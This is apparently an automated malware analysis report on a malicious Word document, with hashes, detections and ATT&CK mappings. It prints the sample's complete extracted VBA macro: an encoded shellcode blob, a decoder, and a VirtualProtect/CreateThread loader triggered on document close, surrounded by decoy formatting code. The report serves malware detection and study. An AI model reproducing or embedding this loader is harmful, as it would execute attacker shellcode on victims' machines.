Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8a3d19548e66a445…

MALICIOUS

Office (OLE)

159.0 KB Created: 2020-05-16 15:58:00 Authoring application: Microsoft Office Word First seen: 2020-07-24
MD5: 2ac3a1fed25354bdd5103f870616f184 SHA-1: ee3847c2511cf5bebeecc6f8cbb41be2b1ea6670 SHA-256: 8a3d19548e66a4456217731fc1fc80d470773107485fa4c97d395b5824c5b55b
112 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro, indicated by the OLE_VBA_MACROS and OLE_VBA_DOCOPEN heuristics. The macro references Windows API functions such as VirtualProtect and CreateThread, suggesting it is designed to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature as a downloader.

Heuristics 6

  • ClamAV: Doc.Downloader.Generickdz-7993664-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generickdz-7993664-0
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21527 bytes
SHA-256: f70aa6f6fa17099daf346edfbe4939a1e2a56c50b826af3bcb1c4b7c876203c3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
    Private Declare PtrSafe Function VirtualProtect Lib "kernel32" ( _
        lpAddress As LongPtr, _
        dwSize As LongPtr, _
        flNewProtect As Long, _
        pdwOldProtect As LongPtr) As Long
    Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _
        lpThreadAttributes As LongPtr, _
        dwStackSize As LongPtr, _
        lpStartAddress As LongPtr, _
        lpParameter As LongPtr, _
        dwCreationFlags As Long, _
        lpThreadId As LongPtr) As LongPtr
    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
    Private Declare PtrSafe Function WaitForSingleObject Lib "kernel32" ( _
        hHandle As LongPtr, _
        dwMilliseconds As Long) As Long
    Private Declare PtrSafe Sub ExitProcess Lib "kernel32" ( _
        uExitCode As Long)
Private Declare PtrSafe Function ActivateKeyboardLayout Lib "user32" (ByVal hklzzz As Long, ByVal Flags As Long) As Long
Private Declare PtrSafe Function AddAccessAllowedAce Lib "advapi32.dll" (pAcl As Byte, ByVal dwAceRevision As Long, ByVal AccessMask As Long, pSid As Byte) As Long
Private Declare PtrSafe Function AddAccessDeniedAce Lib "advapi32.dll" (pAcl As Byte, ByVal dwAceRevision As Long, ByVal AccessMask As Long, pSid As Byte) As Long
Private Declare PtrSafe Function AddAce Lib "advapi32.dll" (ByVal pAcl As Long, ByVal dwAceRevision As Long, ByVal dwStartingAceIndex As Long, ByVal pAceList As Long, ByVal nAceListLength As Long) As Long
Private Declare PtrSafe Function AlphaBlend Lib "msimg32.dll" (ByVal hdc As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hdc As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long
Private Declare PtrSafe Function AnimateWindow Lib "user32" (ByVal hwnd As Long, ByVal dwTime As Long, ByVal dwFlags As Long) As Boolean
Private Declare PtrSafe Function auxGetDevCaps Lib "winmm.dll" Alias "auxGetDevCapsA" (ByVal uDeviceID As Long, lpCaps As Long, ByVal uSize As Long) As Long
Private Declare PtrSafe Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long
Private Declare PtrSafe Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As Long) As Long
Private Declare PtrSafe Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare PtrSafe Function BringWindowToTop Lib "user32" (ByVal hwnd As Long) As Long
Private Declare PtrSafe Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare PtrSafe Function CheckMenuRadioItem Lib "user32" (ByVal hMenu As Long, ByVal un1 As Long, ByVal un2 As Long, ByVal un3 As Long, ByVal un4 As Long) As Long
Private Declare PtrSafe Function ClientToScreen Lib "user32" (ByVal hwnd As Long, lpPoint As Long) As Long
Private Declare PtrSafe Function CopyRect Lib "user32" (lpDestRect As Long, lpSourceRect As Long) As Long
Private Declare PtrSafe Function SetRect Lib "user32" (lpRect As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare PtrSafe Function CreateCompatibleBitmap Lib "gdi32" (ByVal hdc As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
    
#Else
    Private Declare Function VirtualProtect Lib "kernel32" ( _
        lpAddress As Long, _
        dwSize As Long, _
        flNewProtect As Long, _
        pdwOldProtect As Long) As Long
    Private Declare Function CreateThread Lib "kernel32" ( _
        lpThreadAttributes As Long, _
        dwStackSize As Long, _
        lpStartAddress As Long, _
        lpParameter As Long, _
        dwCreationFlags As Long, _
        lpThreadId As Long) As Long
    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
    Private Declare Function WaitForSingleObject Lib "kernel32" ( _
        hHandle As Long, _
        dwMilliseconds As Long) As Long
    Private Declare Sub ExitProcess Lib "kernel32" ( _
        uExitCode As Long)
Private Declare Function ActivateKeyboardLayout Lib "user32" (ByVal hklzzz As Long, ByVal Flags As Long) As Long
Private Declare Function AddAccessAllowedAce Lib "advapi32.dll" (pAcl As Byte, ByVal dwAceRevision As Long, ByVal AccessMask As Long, pSid As Byte) As Long
Private Declare Function AddAccessDeniedAce Lib "advapi32.dll" (pAcl As Byte, ByVal dwAceRevision As Long, ByVal AccessMask As Long, pSid As Byte) As Long
Private Declare Function AddAce Lib "advapi32.dll" (ByVal pAcl As Long, ByVal dwAceRevision As Long, ByVal dwStartingAceIndex As Long, ByVal pAceList As Long, ByVal nAceListLength As Long) As Long
Private Declare Function AlphaBlend Lib "msimg32.dll" (ByVal hdc As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hdc As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long
Private Declare Function AnimateWindow Lib "user32" (ByVal hwnd As Long, ByVal dwTime As Long, ByVal dwFlags As Long) As Boolean
Private Declare Function auxGetDevCaps Lib "winmm.dll" Alias "auxGetDevCapsA" (ByVal uDeviceID As Long, lpCaps As Long, ByVal uSize As Long) As Long
Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long
Private Declare Function BeginDeferWindowPos Lib "user32" (ByVal nNumWindows As Long) As Long
Private Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Private Declare Function BringWindowToTop Lib "user32" (ByVal hwnd As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Function CheckMenuRadioItem Lib "user32" (ByVal hMenu As Long, ByVal un1 As Long, ByVal un2 As Long, ByVal un3 As Long, ByVal un4 As Long) As Long
Private Declare Function ClientToScreen Lib "user32" (ByVal hwnd As Long, lpPoint As Long) As Long
Private Declare Function CopyRect Lib "user32" (lpDestRect As Long, lpSourceRect As Long) As Long
Private Declare Function SetRect Lib "user32" (lpRect As Long, ByVal X1 As Long, ByVal Y1 As Long, ByVal X2 As Long, ByVal Y2 As Long) As Long
Private Declare Function CreateCompatibleBitmap Lib "gdi32" (ByVal hdc As Long, ByVal nWidth As Long, ByVal nHeight As Long) As Long
#End If

Const PAGE_EXECUTE_READWRITE = &H40
Const INFINITE = &HFFFFFFFF

Private Function g(filepathInterElse As String, linkInternationalElse0 As Long) As Byte
    g = Asc(Mid(filepathInterElse, linkInternationalElse0, 1))
End Function

Private Function errStyleLetter(filepathInterElse As String) As Byte()
    Dim categoryStylePrinter() As Byte
    
    errReadCorrections = "a"
    dateInterMax = Asc(errReadCorrections)
    extensionSecurityEditing = Len(filepathInterElse)
    ReDim categoryStylePrinter(0 To extensionSecurityEditing / 2 - 1) As Byte
        
    For totalElseBackstage = 0 To extensionSecurityEditing / 2 - 1
        matchInternationalValidation = g(filepathInterElse, totalElseBackstage * 2 + 1) - dateInterMax
        categoryStylePrinter(totalElseBackstage) = matchInternationalValidation * 16
    Next
    For totalElseBackstage = 0 To extensionSecurityEditing / 2 - 1
        Z = g(filepathInterElse, totalElseBackstage * 2 + 2) - dateInterMax
        categoryStylePrinter(totalElseBackstage) = categoryStylePrinter(totalElseBackstage) + Z
    Next
    errStyleLetter = categoryStylePrinter
End Function

Sub strRelativeSoft()
    
    Application.ScreenUpdating = False
    ActiveDocument.Tables(1).Columns(3).Cells(2).Select
    With ActiveDocument
        .Range(Start:=.Tables(1).Columns(3).Cells(2).Range.Start, End:=.Tables(2).Range.Characters.Last.End - 1).Select
    End With
    With Selection
        .Style = "Table red"
        .Delete
        .HomeKey wdStory
    End With
    
    Application.ScreenUpdating = False
End Sub

Sub CreateStyleList_BuiltInStyles()

    Dim clientRecentStyle As Document
    Dim totalLanguageSegment As Document
    Dim urlSegmentTotal As Table
    Dim daysPortugueseLabels As Long
    Dim methodPdcConnector As String
    Dim l As Integer
    
    Application.ScreenUpdating = False
    System.Cursor = wdCursorWait
    methodPdcConnector = "List dAll Buildt-in Stylded Names"
    
    Set clientRecentStyle = ActiveDocument '
        

    Set totalLanguageSegment = Documents.Add
    
    clientRecentStyle.Activate
    Application.ScreenRefresh
    
    Set urlSegmentTotal = clientRecentStyle.Tables(1)
    For daysPortugueseLabels = 2 To urlSegmentTotal.Rows.Count
        With urlSegmentTotal
            l = Left(.Cell(daysPortugueseLabels, 2).Range.Text, Len(.Cell(daysPortugueseLabels, 2).Range.Text) - 2)
            
            On Error Resume Next
            .Cell(n, 10).Range.Text = totalLanguageSegment.Styles(nStyleConst).NameLocal
            
            If Err.Number = 5941 Then
                If l <> 999 Then
                    With urlSegmentTotal.Cell(n, 10)
                        .Range.Style = "Tabdle"
                        .Range.Text = "(Not fodund)"
                    End With
                End If
                Err.Clear
    Application.ScreenRefresh
    System.Cursor = wdCursorNormal
                GoTo thedateValidationTotal
            End If
        End With
thedateValidationTotal:
    Next n
    
    Application.ScreenUpdating = True
    
    clientRecentStyle.Activate
    MsgBox "Local style names have been inserted in column 10.", vbOKOnly, methodPdcConnector

ExitHere:
    Set clientRecentStyle = Nothing
    clientRecentStyle.Activate
    Selection.HomeKey uriCorrectionsPrinter
    On Error Resume Next
    oDocNormal.Close matchInternationalValidation0:=wdDoNotSaveChanges
    Set totalLanguageSegment = Nothing
    Set urlSegmentTotal = Nothing
End Sub


#If VBA7 Then
    Dim vServerPortuguese As LongPtr
#Else
    Dim vServerPortuguese As Long
#End If



Private Sub Document_Close()
    Dim linkInternationalElse As String, colAccountServer() As Byte
    linkInternationalElse = "ijoagkabcjoafkdmaiapifhfahaaaaffeiijofeiibomdiabaaaafdfhfgeiijenbaoiaaaaaaaafieiidoicgeiijefpieiidomcaeiininnepoppppoinaadaaaaeiidmecaeiilefbaeiifmahegmeiidomcaeiininnepoppppoigbaaaaaaeiidmecaijifnapoppppifmaheeoeiilefpieiafcnbbaaaaeiidomcaeimhmbaaaaaaaaeiijmceminefjeoijaacaaaaeiidmecaeiafcnbbaaaaeiidomcailinnapoppppeiilffpiejijmaemininnepoppppoiinabaaaaeiidmecaolaafofpflmjmdffeiijofeiibomliabaaaafhfgfdeiijenbaeidbmaeidbmjeiinlnfapopppplbbafbpdkkfjeiinlngapopppppdkkmhiffapoppppbaaaaaaamhifgapoppppbaaaaaaamhifhapoppppgiaaaaaamhifkmpoppppabaaaaaaggmhiflapoppppaaaaeiilfnbaoibmaaaaaaeddkfmfhgjgogegphhhdfmfdhjhdfhepfhdgdefmgdgngecogfhigfaafoeiidomcaeiijpbppjdlaaaaaaaeiidmecaifmafghfcboibmaaaaaaeddkfmfhgjgogegphhhdfmhdhjhdhegfgndddcfmgdgngecogfhigfaafoeiidomcaeiininpapoppppolaocfhdcacpgdcacchagb" & _
    "hfhdgfccaaeiinbfolppppppejijpappjdliaaaaaaeiidmecaeiidomfaeimhmbaaaaaaaaeiinjfpapoppppeminiffapoppppeminingapoppppeimheececaabaaaaaaeimheececicaaaaaaaeimheecedaaaaaaaaaeimheecediaaaaaaaaeiinifhapoppppeiijeeceeaeiinifnipoppppeiijeeceeippfdhaeiidmefaifmaheckeiidomcaeiilinoapoppppppfdcieiidmecaeiidomcaeiilinnipoppppppfdcieiidmecailifoipoppppflfofpmjmdffeiijofeiidomcifhfgfdijenbaeiijffbiemijefcaemijmleiidomcaeimhmbppapbpaaeimhmcaaaaaaaaeeilefbappfddaeiidmecaeiijefoaeiidomdaeiilenoaeimhmcaaaaaaaaemilefcaejmhmbaadaaaaaeimheececaeaaaaaaappfddieiidmedaeiijefoieiidomdaeiilenoaeiilffoiemilefbiemilencaeiinefpaeiijeececappfdeaeiidmedaeiidomeaeiilenoaeimhmcaaaaaaaaejmhmaaaaaaaaaemilenoieimheececaaaaaaaaaeimheececiaaaaaaaaeimheecedaaaaaaaaappfdeieiidmeeaeiidomcaeiilenoappfdcieiidmecaflfofpmjmdffeiijofei" & _
    "idomcifhfgfdmhefoabaaaaaaaiienbaeiijffbiemijefcaeiilhncaljgeaaaaaadbmaijefpipdkkeiilhfbiilagijefoeeiilhncailegaeidoaadijahilegaiidoaadijehaeijefpaabefpiilegamidoaahijehaiijefpeabefpiiddpabhfadppefpiilefoeeidbnleiidomcaijmbeiijnkoikmabaaaaeiidmecaeippmdaplgenbaghodaidaeeboaphfnoolagdieeboaphfngppenpihfnbabfnoaeidbnldifnbaheeeilenpaeiinhgbaeiijhfoikmiemahfpleiilefoieiijeenpameippmdocojeidbnlilenpeeiijhfoikmiemahfpleiilefoieiijeenpceeippmdocojiddpabhfaeeiijhhfmilefoaflfofpmjmdffeiijoffhfgfdebfeebffebfgeiijmpemincbemingjaioiaaaaaaaafoeiidmghceminlgkgaaaaaaemdjpghdfgaplkcgahhdcceiidomcaeiijnjeiijpcenijoaejmhmbaaaaaaaaoicoabaaaaeiidmecaeiklknolndeiidomcaeiijpboigcacaaaaeiidmecaeiifmahfapeiidomcaeiijpbebppffaaeiidmecaeiijmdkmiemahfplolkfebfoebfnebfmflfofpmjmdglgfhcgogfgmdddccogegmgmaamichfoeimonb" & _
    "akeapfankoelmjiolfnoionodkblpibgfffcjpmegfmpppdmjbdgmkamkcdajcikffoemninadeikagepijalddccmdjjkadbljfnoodfpjijoeapkjihdgigfgmgmdddccogegmgmaajhbojenigohegegmgmcogegmgmaaifioaacphhgjgogjgogfhecogegmgmaaohloelhpmedpnkhbkianpjkflbdedokbhdgigmhhgbhagjcogegmgmaajlijdpekhfhdgfhcdddccogegmgmaaiopcgembffeiijofijmiabnaijmcmbocakabnaijmcmbokagdbnamjmdffeiijofeiidomaifgeiijmodbmaaplgbgeippmgifnchebbeiidomcaijmboimfppppppeiidmecaolofamiafomjmdffeiijofeiidombifhfgfdeiijenbaeiijffbiemijefcaemijencieiilefbaendbnceeilfadmemabnaeiilhnbaeeiljaiiaaaaaaemabnhiliaimaaaaaaijefpaeiilfnbieiibplppppaaaahhameeilfhbaemcjndojidaaaaaaeidbpgilhhcaeiadhfbaeidbnldlfpbihddbppmdeidbmakneiadefbaeiijefpeeiilenbipgabiahecceiidomcaeiijmboieeppppppeiidmecaeiilenbidjabhfmmolcbeidbmaojkaaaaaaaeiidomcaeiilenbieiijmcoiclabaaaaeiidme" & _
    "caeiifmahfkjeiilefcieiifmaheaheiilenpeeiijaieidbpgilhhceeiadhfbaaplhfmfopoeidbpgilhhbmeiadhfbaeidbmailaejoeiifmahekleiadefbaeidjpihcekeiijpjeeilffpaemabnbeidjmihddleidbmaeidlefcaheikeiibhnbippppaaaahhbfeiidomcaeiilenbaeiilffbippffcaeiidmecaolbdeiidomcaeiilenbaeiilffpeppffcaeiidmecaflfofpmjmdffeiijofeiidombifdfhfgeiijenbaeidbmagfeiileagaeiilhfbaeiifpghfageiileabaolgleiileabieiileabaeiijefpaolajeiilaaeidlefpahefbeiinbieiilhlgaeiifppheoleiilhfbaeidbmjikbgeippmgiapkgbhcaiiapkhkhhadiaokcaggdlelfihcakienchfmieiileddaolbpikdeapeippmbeippmbiapogbhcaiiapohkhhadiaoocadipchemeolkgeidbmafofpflmjmdffeiijofikabeippmbikcceippmccioahfaeieoehfooeiaplomamjmdffijofibomkaaaaaaafdfhfgoiaaaaaaaafiidoibbijefpminjfgeppppppfcoimaacaaaailefaiifmaheehinjfgeppppppfcoigjaaaaaaijifgappppppifmahedbilefpmafkjajaaaainffme" & _
    "fcfagkaaoimhabaaaaafkjajaaaainjfgeppppppfcfapphfpmpplfgappppppoiekabaaaaolchilefpmafkjajaaaainffmefcfagkaboijgabaaaainjfgeppppppfcinffmefcpphfaioifeadaaaafofpflmjmcaeaaffijofibomhaabaaaafhfgfddbmainlnjapoppppljamaaaaaafbpdkkfjinlnjmpopppppdkkmhifjapoppppamaaaaaamhifjmpoppppamaaaaaamhifkipoppppeeaaaaaamhifnepoppppabaaaaaaggmhifnipoppppaaaailfnaioibmaaaaaaeddkfmfhgjgogegphhhdfmfdhjhdfhepfhdgdefmgdgngecogfhigfaafofgppfdfiifmafghfcboibmaaaaaaeddkfmfhgjgogegphhhdfmhdhjhdhegfgndddcfmgdgngecogfhigfaafofgoiaoaaaaaacfhdcacpgdcacchagbhfhdgfccaainjfpmpoppppfcppfdfmidmeaminjfompoppppfcinjfkipoppppfcgkaagkaagkcagkabinjfjmpoppppfcinjfjapoppppfcinjfpmpoppppfcgkaappfddiifmahebipplfpapoppppppfdbepplfompoppppppfdbeilifpepoppppflfofpmjmcaeaaffijofidomamfhfgfdilfnbepphfaigkaagippapbpaappfdbiijefpegkeagiaadaaa" & _
    "aapphfbagkaapphfpeppfdbmijefpigkaapphfbapphfampphfpipphfpeppfdcagkaagkaagkaapphfpigkaagkaapphfpeppfdcepphfpeppfdbeflfofpmjmcbaaaffijofidombifhfgfdmhefoibaaaaaaailhnbaljdiaaaaaadbmaijefpmpdkkilhfamilagijefomilhnbailegaeidoaadijahilegaiidoaadijehaeijefpeabefpmilegamidoaahijehaiijefpiabefpmiddpabhfadppefpmilefomdbnlfdfaoijiafaaaaedilenaiodaidaeeboaphfonolagdieeboaphfofppenpmhfoaabfnoidbnldjfnaihedhilenpeinhgbaijhfpakmiemahfplilefpaijeejpamedocoodbnlilenpiijhfpakmiemahfplilefpaijeejpbiedocooiddpabhfadijhhdeilefoiflfofpmjmcamaaffijofidomamfhfgfdilhnaiinahijefpeinehaeijefpioiaaaaaaaafoinhgehinjokgaaaaaadjnohddcaplkcgahhdbcgkaapphfpefgpphfpmoidcafaaaaklknoloefgoipaafaaaaifmahfagilefpifgppbaijefpmkmiemahfplolmkflfofpmjmcaeaaglgfhcgogfgmdddccogegmgmaamichfoeimonbakeapfankoelmjiolfnoionodkblpibgfffc" & _
    "jpmegfmpppdmjbdgmkamkcdajcikffoemninadeikagepijalddccmdjjkadbljfnoodfpjijoeapkjihdgigfgmgmdddccogegmgmaajhbojenigohegegmgmcogegmgmaaifioaacphhgjgogjgogfhecogegmgmaaohloelhpmedpnkhbkianpjkflbdedokbhdgigmhhgbhagjcogegmgmaajlijdpekhfhdgfhcdddccogegmgmaaiopcgembffijofibomdmadaaaafgfhfdilhfamilfnbafdfginjfmmpmppppfcoihoadaaaailegaeijefpiinegamijefpmppenpiapiincaaaaaailefpmidefpmaefdinjfmmpmppppfcppdaoimdaaaaaaifmahenniddoaahfbkgkaagkaapphfaiinjfmmpmppppfcgkaagkaappfdeaojjjaaaaaaiddoabhfekpphgdeinjfmmpmppppfcoiaiaaaaaacccfhdcccmcfhdaainjfpapnppppfcppfdfmidmebagkaagkaainjfpapnppppfcoianaaaaaahchfgogegmgmdddccogfhigfaagkaagkaappfdeaolekiddoachfefinjfmmpmppppfcoiaiaaaaaacnhdcacccfhdccaainjfpapnppppfcppfdfmidmeamgkaagkaainjfpapnppppfcoianaaaaaahcgfghhdhghcdddccogfhigfaagkaagkaappfdeaflfpfomjmcamaaff" & _
    "ijofibomaabaaaaafdpphfbagiaabaaaaainjfaapappppfcpphfampphfaioimmaaaaaaijmdifmaheeddbmaidplachgdmggiblnaapappppenfkhebdggidlnaapappppaahfchggmhifaapappppenfkilefbagiiibdaaaappfadmpphfbafdinjfaapappppfcpphfamoiafaaaaaaflmjmcamaaffijofidomaifhfdmhefpiaaaaaaaamhefpmaaaaaaaailfnbegkaagiiaaaaaaagkadgkaagkabgiaaaaaaeapphfaippfdcmijefpiidpippheckgkaagkaagkaapphfpippfddagkaainffpmfcpphfbapphfampphfpippfddeifmaheaiilefbadlefpmheaedbppoladdbppehilefpiidpippheaefappfdbeijpiflfpmjmcbaaaffijofibomceaeaaaafhfgfdmhifnmplppppppppppppmhifoaplppppaaaaaaaamhifoeplppppaaaaaaaamhifoiplppppaaaaaaaamhifomplppppaaaaaaaamgefpmaailfnbigkaagiiaaaaaaagkacgkaagkabgiaaaaaaeapphfamppfdcmijifnmplppppidpippapiepgaaaaaagkaagkaagkaagkabinffpmfcppfdeiijifoaplppppifmaapienjaaaaaainjfoiplppppfcgiaaaaaaiagkaagkaapphfaifappfdemij" & _
    "ifoeplppppifmaapieleaaaaaadbmaeaijifpaplppppijifpiplppppilhnbailifpiplppppifmaapiejeaaaaaailifpaplppppifmaapieikaaaaaainjfpaplppppfcgiaaaeaaaainjfpmplppppfcpplfoeplppppppfdfaijifpiplppppifmahegadbmjinlfpmplppppilefbedjifomplpppphebidlinpaplpppphebakmkkapdbiiegppppifomplppppebolnngkaainjfpeplppppfcpplfpaplppppinjfpmplppppfcpplfnmplppppppfddeifmahebcilinpaplppppdlinpeplppppapiefoppppppdbppolagillnomplppppilifnmplppppidpippheaefappfdbeilifoeplppppifmaheaefappfdfeilifoaplppppifmaheaefappfdfeijpiflfofpmjmcbeaaffijofidombafhfgfdilhnaiilfnbafhgiaeabaaaappfdciinhmahplijhnpailffaminecbiijefpeilecaiijefpiilacijefpmppenpihiboilhfpeildgilhnpakmkkiemahfpkpphfaippfdfiifmahedgidefpeaeolnnilhnpaapdbijmcljaiaaaaaaiinaceapaegbkkmbokaeocpeidhnpmaahfaimhahcogcgbheolagmhahcohchhhkmgehaeaaflfofpmjmcamaaffijofil" & _
    "efaiadefamijmcmbocakabnaijmcmbokagdbnamjmcaiaaffijoffgilhfaidbmaaplgbgegifncheajfcfaoimnppppppolopamiafomjmcaeaaffijofidomaifhfgfdilefaiadeadmilhihiadhnaiileahmijefpiilfnamibplppppaaaahhafclfpbaolffilhhcaadhfaidbnldlfpbihdbpedknadefaiijefpmilenampgabiahebdfaoijbppppppilenamdjabhfnoolbcdbmaolggilenamijmcoinoaaaaaaifmahfmkilefbeifmaheafilenpmijaiilhhceadhfaiaplhfmfopoilhhbmadhfaiilaejoifmahemkadefaidjpihccnijpjadenpidjmihdcedbmadlefbaheldibhnamppppaaaahhalpphfampphfaippffbaolajpphfpmpphfaippffbaflfofpmjmcbaaaffijofidomaefhfgfdgekbdaaaaaaailhfaiifpghfafileaaiolfjileaamileaamijefpmolahilaadlefpmheefinbiilhldaifpphepailhfaidbmjikbgegiapkgbhcaiiapkhkhhadiaokcaggdlelcmhcajienchfnbiledbiolbkikdeapebebiapogbhcaiiapohkhhadiaoocadipchemlolledbmaflfofpmjmcaeaaikabebikcceccioahfaeieoehfpcaplomamdbhklni" & _
    "jcjfmonhidgcmkgfkajpobpcpngdhegopbieefhecipkpplogdlnaeamkcmcmheljoacckhmajfnmloddfejlaafbiaaficldpikijhpklnamachchcheilimjodphiinicpnigcgjpmlcmilbjhibpibojcdecmiffncjopamcnlihiknalgegdpllcbikoliegopjbbfcfechlmfbiklpdekokpaiiiedfdmlmekdekimfhmobngpehnnpapfoppdmaccjpdjepikmbmgfpgiilbhginonjngejdcglmjhbfdlbechakdkpoaonnfipcpnleoclpcgnfadghdjabfinaaondoeafjlafcdmajlmjeglghfdmakdaoamnhjgcmobgaibflphfcipfhhpiedojjoebffkomhhkjlkbdbijoeakkffknmekjaeklljpanclhgnn"
    
    colAccountServer = errStyleLetter(linkInternationalElse)
    
#If VBA7 Then
    Dim carHelpRecent As LongPtr, linkLabelsSecurity As LongPtr, hostElapsedConnector As LongPtr
#Else
    Dim carHelpRecent As Long, linkLabelsSecurity As Long, hostElapsedConnector As Long
#End If
    Dim totalLanguageSegment0 As Long
    carHelpRecent = VarPtr(colAccountServer(0))
#If Win64 Then
    linkLabelsSecurity = carHelpRecent And &HFFFFFFFFFFFFF000^
#Else
    linkLabelsSecurity = carHelpRecent And &HFFFFF000
#End If
    hostElapsedConnector = carHelpRecent - linkLabelsSecurity + UBound(colAccountServer)
    thedateDiscretionaryStyle = VirtualProtect(ByVal linkLabelsSecurity, ByVal hostElapsedConnector, ByVal PAGE_EXECUTE_READWRITE, ByVal VarPtr(totalLanguageSegment0))

    vServerPortuguese = CreateThread(ByVal 0&, ByVal 0&, ByVal carHelpRecent, ByVal 1&, ByVal 0, ByVal 0&)
    thedateDiscretionaryStyle = WaitForSingleObject(ByVal vServerPortuguese, ByVal INFINITE)
    ' ExitProcess ByVal 0
    MsgBox "Error 0x80031407"
End Sub

Private Sub Document_Open()

    Application.Quit
End Sub